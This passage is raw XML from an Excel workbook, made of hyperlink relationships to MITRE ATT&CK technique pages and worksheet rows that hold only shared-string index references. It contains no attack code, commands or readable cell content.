Target="https://attack.mitre.org/techniques/T1036/003" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/002" TargetMode="External"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/009" TargetMode="External"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1219" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1586/002" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1567/002" TargetMode="External"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1018" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/005" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056/003" TargetMode="External"/><Relationship Id="rId462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/009" TargetMode="External"/><Relationship Id="rId518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/005" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/001" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1561" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1578/003" TargetMode="External"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/001" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/004" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/004" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098/003" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1222" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/004" TargetMode="External"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/005" TargetMode="External"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/003" TargetMode="External"/><Relationship Id="rId529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1550/004" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1565/001" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1568/001" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1498/001" TargetMode="External"/><Relationship Id="rId540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1497" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/004" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/004" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1592/001" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/007" TargetMode="External"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/005" TargetMode="External"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596/005" TargetMode="External"/><Relationship Id="rId484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1602" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1570" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/004" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1560/002" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/007" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1499/001" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/004" TargetMode="External"/><Relationship Id="rId551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1047" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/001" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048/002" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/004" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/005" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1563/002" TargetMode="External"/><Relationship Id="rId453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1129" TargetMode="External"/><Relationship Id="rId509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1205" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1136/002" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/006" TargetMode="External"/><Relationship Id="rId495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1082" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/005" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/008" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1554" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1491/001" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/012" TargetMode="External"/><Relationship Id="rId520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/001" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/002" TargetMode="External"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1496" TargetMode="External"/><Relationship Id="rId464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/011" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1559/001" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1561/002" TargetMode="External"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/003" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1222/001" TargetMode="External"/><Relationship Id="rId433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1029" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/001" TargetMode="External"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1598/002" TargetMode="External"/><Relationship Id="rId500" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1033" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/003" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589" TargetMode="External"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1593" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1202" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557" TargetMode="External"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/005" TargetMode="External"/><Relationship Id="rId511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1537" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/001" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1610" TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591" TargetMode="External"/><Relationship Id="rId455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/0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BDAD5-3446-B54B-AD1D-D71C739C843E}">
  <dimension ref="A1:K494"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B1" sqref="B1:K1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="2" max="2" width="10.83203125"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t="s">
        <v>11</v>
      </c>
      <c r="B2" t="s">
        <v>12</v>
      </c>
      <c r="C2" t="s">
        <v>13</v>
      </c>
      <c r="D2" s="2" t="s">
        <v>14</v>
      </c>
      <c r="E2" t="s">
        <v>15</v>
      </c>
      <c r="F2" t="s">
        <v>16</v>
      </c>
      <c r="G2" t="s">
        <v>17</v>
      </c>
      <c r="H2" t="s">
        <v>18</v>
      </c>
      <c r="J2" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="3" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A3" t="s">
        <v>20</v>
      </c>
      <c r="B3" t="s">
        <v>21</v>
      </c>
      <c r="C3" t="s">
        <v>22</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E3" t="s">
        <v>15</v>
      </c>
      <c r="F3" t="s">
        <v>16</v>
      </c>
      <c r="G3" t="s">
        <v>17</v>
      </c>
      <c r="H3" t="s">
        <v>18</v>
      </c>
      <c r="J3" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="4" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A4" t="s">
        <v>24</v>
      </c>
      <c r="B4" t="s">
        <v>25</v>
      </c>
      <c r="C4" t="s">
        <v>26</v>
      </c>
      <c r="D4" s="2" t="s">
        <v>27</v>
      </c>
      <c r="E4" t="s">
        <v>28</v>
      </c>
      <c r="F4" t="s">
        <v>29</v>
      </c>
      <c r="G4" t="s">
        <v>30</v>
      </c>
      <c r="H4" t="s">
        <v>18</v>
      </c>
      <c r="J4" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="5" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A5" t="s">
        <v>31</v>
      </c>
      <c r="B5" t="s">
        <v>32</v>
      </c>
      <c r="C5" t="s">
        <v>33</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>34</v>
      </c>
      <c r="E5" t="s">
        <v>15</v>
      </c>
      <c r="F5" t="s">
        <v>16</v>
      </c>
      <c r="G5" t="s">
        <v>17</v>
      </c>
      <c r="H5" t="s">
        <v>18</v>
      </c>
      <c r="I5" t="s">
        <v>35</v>
      </c>
      <c r="J5" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="6" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A6" t="s">
        <v>36</v>
      </c>
      <c r="B6" t="s">
        <v>37</v>
      </c>
      <c r="C6" t="s">
        <v>38</v>
      </c>
      <c r="D6" s="2" t="s">
        <v>39</v>
      </c>
      <c r="E6" t="s">
        <v>15</v>
      </c>
      <c r="F6" t="s">
        <v>16</v>
      </c>
      <c r="G6" t="s">
        <v>17</v>
      </c>
      <c r="H6" t="s">
        <v>18</v>
      </c>
      <c r="I6" t="s">
        <v>40</v>
      </c>
      <c r="J6" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="7" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A7" t="s">
        <v>41</v>
      </c>
      <c r="B7" t="s">
        <v>42</v>
      </c>
      <c r="C7" t="s">
        <v>43</v>
      </c>
      <c r="D7" s="2" t="s">
        <v>44</v>
      </c>
      <c r="E7" t="s">
        <v>45</v>
      </c>
      <c r="F7" t="s">
        <v>46</v>
      </c>
      <c r="G7" t="s">
        <v>30</v>
      </c>
      <c r="H7" t="s">
        <v>18</v>
      </c>
      <c r="J7" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="8" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A8" t="s">
        <v>48</v>
      </c>
      <c r="B8" t="s">
        <v>49</v>
      </c>
      <c r="C8" t="s">
        <v>50</v>
      </c>
      <c r="D8" s="2" t="s">
        <v>51</v>
      </c>
      <c r="E8" t="s">
        <v>52</v>
      </c>
      <c r="F8" t="s">
        <v>53</v>
      </c>
      <c r="G8" t="s">
        <v>54</v>
      </c>
      <c r="H8" t="s">
        <v>18</v>
      </c>
      <c r="J8" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="9" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A9" t="s">
        <v>55</v>
      </c>
      <c r="B9" t="s">
        <v>56</v>
      </c>
      <c r="C9" t="s">
        <v>57</v>
      </c>
      <c r="D9" s="2" t="s">
        <v>58</v>
      </c>
      <c r="E9" t="s">
        <v>15</v>
      </c>
      <c r="F9" t="s">
        <v>16</v>
      </c>
      <c r="G9" t="s">
        <v>17</v>
      </c>
      <c r="H9" t="s">
        <v>18</v>
      </c>
      <c r="J9" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="10" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A10" t="s">
        <v>59</v>
      </c>
      <c r="B10" t="s">
        <v>60</v>
      </c>
      <c r="C10" t="s">
        <v>61</v>
      </c>
      <c r="D10" s="2" t="s">
        <v>62</v>
      </c>
      <c r="E10" t="s">
        <v>63</v>
      </c>
      <c r="F10" t="s">
        <v>64</v>
      </c>
      <c r="G10" t="s">
        <v>30</v>
      </c>
      <c r="H10" t="s">
        <v>65</v>
      </c>
      <c r="I10" t="s">
        <v>66</v>
      </c>
      <c r="J10" t="s">
        <v>19</v>
      </c>
      <c r="K10" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="11" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A11" t="s">
        <v>68</v>
      </c>
      <c r="B11" t="s">
        <v>69</v>
      </c>
      <c r="C11" t="s">
        <v>70</v>
      </c>
      <c r="D11" s="2" t="s">
        <v>71</v>
      </c>
      <c r="E11" t="s">
        <v>72</v>
      </c>
      <c r="F11" t="s">
        <v>73</v>
      </c>
      <c r="G11" t="s">
        <v>30</v>
      </c>
      <c r="H11" t="s">
        <v>74</v>
      </c>
      <c r="J11" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="12" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A12" t="s">
        <v>75</v>
      </c>
      <c r="B12" t="s">
        <v>76</v>
      </c>
      <c r="C12" t="s">
        <v>77</v>
      </c>
      <c r="D12" s="2" t="s">
        <v>78</v>
      </c>
      <c r="E12" t="s">
        <v>79</v>
      </c>
      <c r="F12" t="s">
        <v>80</v>
      </c>
      <c r="G12" t="s">
        <v>30</v>
      </c>
      <c r="H12" t="s">
        <v>18</v>
      </c>
      <c r="J12" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="13" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A13" t="s">
        <v>81</v>
      </c>
      <c r="B13" t="s">
        <v>82</v>
      </c>
      <c r="C13" t="s">
        <v>83</v>
      </c>
      <c r="D13" s="2" t="s">
        <v>84</v>
      </c>
      <c r="E13" t="s">
        <v>15</v>
      </c>
      <c r="F13" t="s">
        <v>85</v>
      </c>
      <c r="G13" t="s">
        <v>30</v>
      </c>
      <c r="H13" t="s">
        <v>86</v>
      </c>
      <c r="I13" t="s">
        <v>87</v>
      </c>
      <c r="J13" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="14" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A14" t="s">
        <v>88</v>
      </c>
      <c r="B14" t="s">
        <v>89</v>
      </c>
      <c r="C14" t="s">
        <v>90</v>
      </c>
      <c r="D14" s="2" t="s">
        <v>91</v>
      </c>
      <c r="E14" t="s">
        <v>92</v>
      </c>
      <c r="F14" t="s">
        <v>93</v>
      </c>
      <c r="G14" t="s">
        <v>94</v>
      </c>
      <c r="H14" t="s">
        <v>18</v>
      </c>
      <c r="I14" t="s">
        <v>95</v>
      </c>
      <c r="J14" t="s">
        <v>19</v>
      </c>
      <c r="K14" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="15" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A15" t="s">
        <v>97</v>
      </c>
      <c r="B15" t="s">
        <v>98</v>
      </c>
      <c r="C15" t="s">
        <v>99</v>
      </c>
      <c r="D15" s="2" t="s">
        <v>100</v>
      </c>
      <c r="E15" t="s">
        <v>101</v>
      </c>
      <c r="F15" t="s">
        <v>102</v>
      </c>
      <c r="G15" t="s">
        <v>30</v>
      </c>
      <c r="H15" t="s">
        <v>18</v>
      </c>
      <c r="J15" t="s">
        <v>19</v>
      </c>
      <c r="K15" t="s">
        <v>103</v>
      </c>
    </row>
    <row r="16" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A16" t="s">
        <v>104</v>
      </c>
      <c r="B16" t="s">
        <v>105</v>
      </c>
      <c r="C16" t="s">
        <v>106</v>
      </c>
      <c r="D16" s="2" t="s">
        <v>107</v>
      </c>
      <c r="E16" t="s">
        <v>108</v>
      </c>
      <c r="F16" t="s">
        <v>16</v>
      </c>
      <c r="G16" t="s">
        <v>17</v>
      </c>
      <c r="H16" t="s">
        <v>18</v>
      </c>
      <c r="I16" t="s">
        <v>109</v>
      </c>
      <c r="J16" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="17" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A17" t="s">
        <v>110</v>
      </c>
      <c r="B17" t="s">
        <v>111</v>
      </c>
      <c r="C17" t="s">
        <v>112</v>
      </c>
      <c r="D17" s="2" t="s">
        <v>113</v>
      </c>
      <c r="E17" t="s">
        <v>15</v>
      </c>
      <c r="F17" t="s">
        <v>16</v>
      </c>
      <c r="G17" t="s">
        <v>17</v>
      </c>
      <c r="H17" t="s">
        <v>18</v>
      </c>
      <c r="J17" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="18" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A18" t="s">
        <v>114</v>
      </c>
      <c r="B18" t="s">
        <v>115</v>
      </c>
      <c r="C18" t="s">
        <v>116</v>
      </c>
      <c r="D18" s="2" t="s">
        <v>117</v>
      </c>
      <c r="E18" t="s">
        <v>118</v>
      </c>
      <c r="F18" t="s">
        <v>29</v>
      </c>
      <c r="G18" t="s">
        <v>30</v>
      </c>
      <c r="H18" t="s">
        <v>18</v>
      </c>
      <c r="J18" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="19" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A19" t="s">
        <v>119</v>
      </c>
      <c r="B19" t="s">
        <v>120</v>
      </c>
      <c r="C19" t="s">
        <v>121</v>
      </c>
      <c r="D19" s="2" t="s">
        <v>122</v>
      </c>
      <c r="E19" t="s">
        <v>108</v>
      </c>
      <c r="F19" t="s">
        <v>16</v>
      </c>
      <c r="G19" t="s">
        <v>54</v>
      </c>
      <c r="H19" t="s">
        <v>18</v>
      </c>
      <c r="J19" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="20" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A20" t="s">
        <v>123</v>
      </c>
      <c r="B20" t="s">
        <v>124</v>
      </c>
      <c r="C20" t="s">
        <v>125</v>
      </c>
      <c r="D20" s="2" t="s">
        <v>126</v>
      </c>
      <c r="E20" t="s">
        <v>15</v>
      </c>
      <c r="F20" t="s">
        <v>16</v>
      </c>
      <c r="G20" t="s">
        <v>17</v>
      </c>
      <c r="H20" t="s">
        <v>18</v>
      </c>
      <c r="I20" t="s">
        <v>127</v>
      </c>
      <c r="J20" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="21" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A21" t="s">
        <v>128</v>
      </c>
      <c r="B21" t="s">
        <v>129</v>
      </c>
      <c r="C21" t="s">
        <v>130</v>
      </c>
      <c r="D21" s="2" t="s">
        <v>131</v>
      </c>
      <c r="E21" t="s">
        <v>85</v>
      </c>
      <c r="F21" t="s">
        <v>16</v>
      </c>
      <c r="G21" t="s">
        <v>17</v>
      </c>
      <c r="H21" t="s">
        <v>18</v>
      </c>
      <c r="J21" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="22" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A22" t="s">
        <v>132</v>
      </c>
      <c r="B22" t="s">
        <v>133</v>
      </c>
      <c r="C22" t="s">
        <v>134</v>
      </c>
      <c r="D22" s="2" t="s">
        <v>135</v>
      </c>
      <c r="E22" t="s">
        <v>15</v>
      </c>
      <c r="F22" t="s">
        <v>136</v>
      </c>
      <c r="G22" t="s">
        <v>54</v>
      </c>
      <c r="H22" t="s">
        <v>18</v>
      </c>
      <c r="J22" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="23" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A23" t="s">
        <v>137</v>
      </c>
      <c r="B23" t="s">
        <v>138</v>
      </c>
      <c r="C23" t="s">
        <v>139</v>
      </c>
      <c r="D23" s="2" t="s">
        <v>140</v>
      </c>
      <c r="E23" t="s">
        <v>28</v>
      </c>
      <c r="F23" t="s">
        <v>29</v>
      </c>
      <c r="G23" t="s">
        <v>30</v>
      </c>
      <c r="H23" t="s">
        <v>18</v>
      </c>
      <c r="J23" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="24" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A24" t="s">
        <v>141</v>
      </c>
      <c r="B24" t="s">
        <v>142</v>
      </c>
      <c r="C24" t="s">
        <v>143</v>
      </c>
      <c r="D24" s="2" t="s">
        <v>144</v>
      </c>
      <c r="E24" t="s">
        <v>15</v>
      </c>
      <c r="F24" t="s">
        <v>16</v>
      </c>
      <c r="G24" t="s">
        <v>54</v>
      </c>
      <c r="H24" t="s">
        <v>18</v>
      </c>
      <c r="J24" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="25" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A25" t="s">
        <v>145</v>
      </c>
      <c r="B25" t="s">
        <v>146</v>
      </c>
      <c r="C25" t="s">
        <v>147</v>
      </c>
      <c r="D25" s="2" t="s">
        <v>148</v>
      </c>
      <c r="E25" t="s">
        <v>15</v>
      </c>
      <c r="F25" t="s">
        <v>16</v>
      </c>
      <c r="G25" t="s">
        <v>54</v>
      </c>
      <c r="H25" t="s">
        <v>18</v>
      </c>
      <c r="J25" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="26" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A26" t="s">
        <v>149</v>
      </c>
      <c r="B26" t="s">
        <v>150</v>
      </c>
      <c r="C26" t="s">
        <v>151</v>
      </c>
      <c r="D26" s="2" t="s">
        <v>152</v>
      </c>
      <c r="E26" t="s">
        <v>153</v>
      </c>
      <c r="F26" t="s">
        <v>154</v>
      </c>
      <c r="G26" t="s">
        <v>54</v>
      </c>
      <c r="H26" t="s">
        <v>18</v>
      </c>
      <c r="J26" t="s">
        <v>47</v>
      </c>
      <c r="K26" t="s">
        <v>155</v>
      </c>
    </row>
    <row r="27" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A27" t="s">
        <v>156</v>
      </c>
      <c r="B27" t="s">
        <v>157</v>
      </c>
      <c r="C27" t="s">
        <v>158</v>
      </c>
      <c r="D27" s="2" t="s">
        <v>159</v>
      </c>
      <c r="E27" t="s">
        <v>15</v>
      </c>
      <c r="F27" t="s">
        <v>16</v>
      </c>
      <c r="G27" t="s">
        <v>17</v>
      </c>
      <c r="H27" t="s">
        <v>18</v>
      </c>
      <c r="J27" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="28" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A28" t="s">
        <v>160</v>
      </c>
      <c r="B28" t="s">
        <v>161</v>
      </c>
      <c r="C28" t="s">
        <v>162</v>
      </c>
      <c r="D28" s="2" t="s">
        <v>163</v>
      </c>
      <c r="E28" t="s">
        <v>164</v>
      </c>
      <c r="F28" t="s">
        <v>165</v>
      </c>
      <c r="G28" t="s">
        <v>30</v>
      </c>
      <c r="H28" t="s">
        <v>18</v>
      </c>
      <c r="J28" t="s">
        <v>19</v>
      </c>
      <c r="K28" t="s">
        <v>166</v>
      </c>
    </row>
    <row r="29" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A29" t="s">
        <v>167</v>
      </c>
